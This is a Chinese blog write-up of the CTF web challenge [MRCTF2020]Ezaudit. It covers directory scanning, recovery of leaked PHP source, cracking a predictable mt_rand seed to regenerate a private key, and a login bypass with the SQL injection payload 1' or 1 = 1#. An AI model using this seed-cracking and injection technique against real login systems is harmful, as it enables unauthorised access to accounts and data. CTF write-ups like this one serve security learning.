[MRCTF2020]Ezaudit WP

最新推荐文章于 2022-04-19 21:23:50 发布
最新推荐文章于 2022-04-19 21:23:50 发布
阅读量471 收藏
点赞数
分类专栏: # 凌晨四点起床刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DARKNOTES/article/details/109249037
版权
进入网站

在这里插入图片描述
在这里插入图片描述

获得源码

看到熟悉的网页模板想到了敏感文档泄露用户信息查询

点击全部链接,尝试输入邮箱发现不是。

完事以后测试其他文件泄露,尝试进行目录遍历,跑脚本

python dirsearch.py -u http://77936295-dc14-466d-9fe7-6cdc5a55a916.node3.buuoj.cn/ -e * --threads=1

发现无论多小的线程速度都会产生429状态码

在这里插入图片描述

原来是服务器限制了访问的频率,猜测和BUUCTF服务器有关系。

只能进行手工检测

发现在www.zip处存在文件下载漏洞,得到index.php源码

审计

源码index.php

<?php 
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($password == '') ||($Private_key == '')) {
        // 若为空,视为未填写,提示错误,并3秒后返回登录界面
        header('refresh:2; url=login.html');
        echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
        exit;
}
    else if($Private_key != '*************' )
    {
        header('refresh:2; url=login.html');
        echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }

    else{
        if($Private_key === '************'){
        $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';'; 
        $link=mysql_connect("localhost","root","root");
        mysql_select_db("test",$link);
        $result = mysql_query($getuser);
        while($row=mysql_fetch_assoc($result)){
            echo "<tr><td>".$row["username"]."</td><td>".$row["flag"]."</td><td>";
        }
    }
    }

} 
// genarate public_key 
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
  }

  //genarate private_key
  function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
  }
  $Public_key = public_key();
  //$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???

看到了php代码中有登陆相关的传参,说明有一个登陆页面调用了index.php,尝试访问login.html,可以看到登陆界面,并且需要密码和私钥。

解决私钥问题

//$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???

审计PHP代码发现$Public_key = KVQP0LdJKRaV3n9D,可以借此得到该PHP代码使用的随机数种子

解题:
1.将公钥转化为种子爆破脚本参数
str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
str2 = 'KVQP0LdJKRaV3n9D'
str3 = str1[::-1]
length = len(str2)
res = ''
for i in range(len(str2)):
    for j in range(len(str1)):
        if str2[i] == str1[j]:
            res += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(str1) - 1) + ' '
            break
print(res)

//36 36 0 61 47 47 0 61 42 42 0 61 41 41 0 61 52 52 0 61 37 37 0 61 3 3 0 61 35 35 0 61 36 36 0 61 43 43 0 61 0 0 0 61 47 47 0 61 55 55 0 61 13 13 0 61 61 61 0 61 29 29 0 61
2.爆破随机数种子

在这里插入图片描述

可以确定为5.2.1+版本下的种子库,种子名为1775196155

3.构造输出公钥私钥的PHP脚本

在php5.6.9运行PHP脚本

<?php
mt_srand(1775196155);
$strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$public_key = '';
for ( $i = 0; $i < 16; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
echo $public_key;

echo "\n";

$strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$private_key = '';
for ( $i = 0; $i < 12; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
echo $private_key;

//KVQP0LdJKRaV3n9D XuNhoueCDCGc

公钥与原来的一致,由此知道私钥正确:XuNhoueCDCGc

4.登录
$getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';'; 

//核心:SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'

构造SQL绕过字符串

 1' or 1 = 1#

POST传参,直接用#就可以了,不用%23

5.得到flag

在这里插入图片描述

flag{4f196edb-b1d5-4691-83ea-28d7309924bf}
車鈊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF系列之Web——联合查询注入
洛柒尘的博客
06-27 3148
前言 在刚学习SQL注入的过程中非常艰难,查资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几篇,都是复制来复制去的,没意思,感觉就是在浪费时间。有很多知识点都很散,很少能考到一片吧所有知识点总结在一块,最少也要三四个知识点也好呀,可惜太少了,大部分大佬写的都是基于他们现有的技术写的,写的很笼统,不适合新手看。可以发现很多大佬的文章看不懂就是这个原因,没有基础看的很懵的。所以我就想着写两三篇来总结我学习过的SQL注入知识点。 学习web系列推荐先学习MySQL、H
【web-ctf】ctf-pikachu-sql
一个努力生活的人的博客
07-11 1099
pikachu-sql
BUUCTF-[MRCTF2020]Ezaudit
qq_24033605的博客
11-04 3235
[MRCTF2020]Ezaudit 扫描目录,发现www.zip可以下载到源码。 进行部分审计, 只有当username,password和private_key全部正确时,才会获取flag。 对于username和password,由于是sql查询,可以万能密码进行绕过,剩下的问题是获取private_key。 给出了获取public_key和private_key的函数,并且mt_rand函数是伪随机函数,只要获取种子值就都不是问题。 接下来我们要根据public_key反推出种子值。 首先转换字
BUUCTF [MRCTF2020]CyberPunk
m0_49025459的博客
04-19 746
题目 下完是个可执行程序 把系统的时间改成2020.9.17就行了,再重新启动一下就行了
[MRCTF2020]Ezaudit
fmyyy1的博客
04-20 292
场景(说实话现在看到这种具体场景的都会心脏骤停一下) 扫路径扫到个www.zip <?php header('Content-type:text/html; charset=utf-8'); error_reporting(0); if(isset($_POST['login'])){ $username = $_POST['username']; $password = $_POST['password']; $Private_key = $_POST['Private_
2020 第二届网鼎杯 boom wp
01-20
2020 第二届网鼎杯 boom wp ​ ​ 卑微新手在线答题。。。。。 第二届网鼎杯-boom 下载附件得到一个boom.exe程序 打开是这样 根据提示继续 得到一串md5 加密的数据,使用在线解密 https://www.somd5.com/ 得到第...
2020年WP新手建站 视频教程.txt
06-17
本套课程是一套2020年全新版的wordpress建站视频教程,我们将全方位解说如何通过wordpress来建站自己的网站,我们会介绍如何购买域名和网站空间、如何搭建网站空间、如何安装wordpress程序、如何做好SEO优化等方面,...
Wp.rar_wp
09-14
简单实用的butterworth滤波器设计,很好用
wp实现一键锁屏功能
04-04
WP8的时候,关于如何关闭屏幕,国内外都有不少文章了,大家有兴趣地可以搜搜,很多,我就不给链接了,因为稍后我的例子中会有。 其实,关闭屏幕是调用了未开放的API,正因为这个API未开放的,不敢保证所有机型都能...
mingyue.exe wp
03-08
mingyue.exe wp
CTF| 简易留言板
qq_42646885的博客
07-08 2877
打开网址是个简易留言板,有两个输入框可以输入。 随便输入几个字符提交后,发先提交一条记录返回四个信息。这四个信息中,姓名和内容是由输入内容决定的,其他两个时间和ID是不可控的,时间获取的是当前时间,可能是使用了SQL的now()函数,ID可能是从1自动增长的。 试下注入,输入一个单引号',提示留言失败。在昵称输入两个单引号,留言成功,昵称显示只有一个单引号。这个应该是Insert二次注...
buuctf [MRCTF2020]Ezaudit 伪随机数
为之的博客
07-21 1213
打开网页,看不出什么,直接打开dirmap扫描 扫出了www.zip 下载后有index.php文件 查看源码后大概意思就是 去login.html页面登录,输入账号密码以及私钥,后2个输对了就能得到flag 密码可以直接用万能钥匙 1' or '1'='1 来绕过,主要就是私钥了 这里涉及到mt_srand()函数,伪随机数,即这随机数是我们可以预测的,只要找到该函数在这的种子值就可以预测, 因为公钥私钥都是使用一个种子值来推...
bugku ctf 管理员系统 (伪造x-forwarded-for绕过服务器IP)
qq_42777804的博客
05-18 4494
随便输入 发现 ip禁止访问 与本地管理员联系登陆 我们查看源码 到最后发现 <!-- dGVzdDEyMw== --> 在线base64解密得到 test123 Username: admin Password:test123 发现居然还是不能提交 那么burp抓包 发给 repeater 发现了可以通...
[MRCTF2020]Ezaudit php_mt_seed 伪随机
scrawman的博客
11-30 387
[MRCTF2020]Ezaudit dirsearch扫出来三个文件,访问login.html,,要求我们输入用户名,密码和私钥。用户名从index.php里看出来是crispr,密码用万能密码,主要是这个私钥。 <?php header('Content-type:text/html; charset=utf-8'); error_reporting(0); if(isset($_POST['login'])){ $username = $_POST['username'];
MRCTF 2020-“TiKi小组”
pone2233的博客
03-29 2492
文章目录题目状态:赛事信息Web:ez_bypass | SOLVED|你传你????呢 | SOLVED|PYwebsite | SOLVED|套娃 | SOLVED|Reverse:无Pwn:无Misc:Hello_Misc | OPEN |你能看懂音符吗 | SOLVED |CyberPunk | SOLVED |ezmisc | SOLVED |pyFlag | OPEN |Unravel!! ...
羊城杯2020 wp
最新发布
08-18
羊城杯2020是一场年度的电子竞技赛事,为广大电竞爱好者提供了一个展示技术和激发激情的舞台。今年的羊城杯聚集了来自全国各地的顶尖电竞选手,他们在各个游戏项目中展现了高水平的操作和战术。 在比赛的文化氛围...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值